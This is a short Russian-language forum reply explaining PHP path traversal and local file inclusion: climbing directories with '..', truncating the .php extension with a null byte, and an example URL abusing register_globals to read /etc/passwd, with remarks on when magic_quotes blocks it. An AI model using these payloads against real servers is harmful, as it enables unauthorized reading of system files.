Выход ни директорию вверх можно сделать путем добавления в параметр ".." (без кавычек). Отрубить расширение php можно нулевым байтом (%00), что, впрочем, далеко не всегда проканывает. Ну, если идеальная ситуация, то так:
param1=../file.txt%00 (если параметр через GET запрос получает скрипт)
или, если в php коде, то:

да легко
примерно так
это при включенном registr global
http://sasasas.com/scipt.php?USER[param1]=../../../../../../../../../../../../../etc/passwd%00

Легко это если только мейджик квотс = офф, т.к. иначе это не прокатит.

P.S. вообще для вопросов есть спец тема и задавать вопросы нужно в ней, а не создавать новую тему.
P.P.S. закрыто.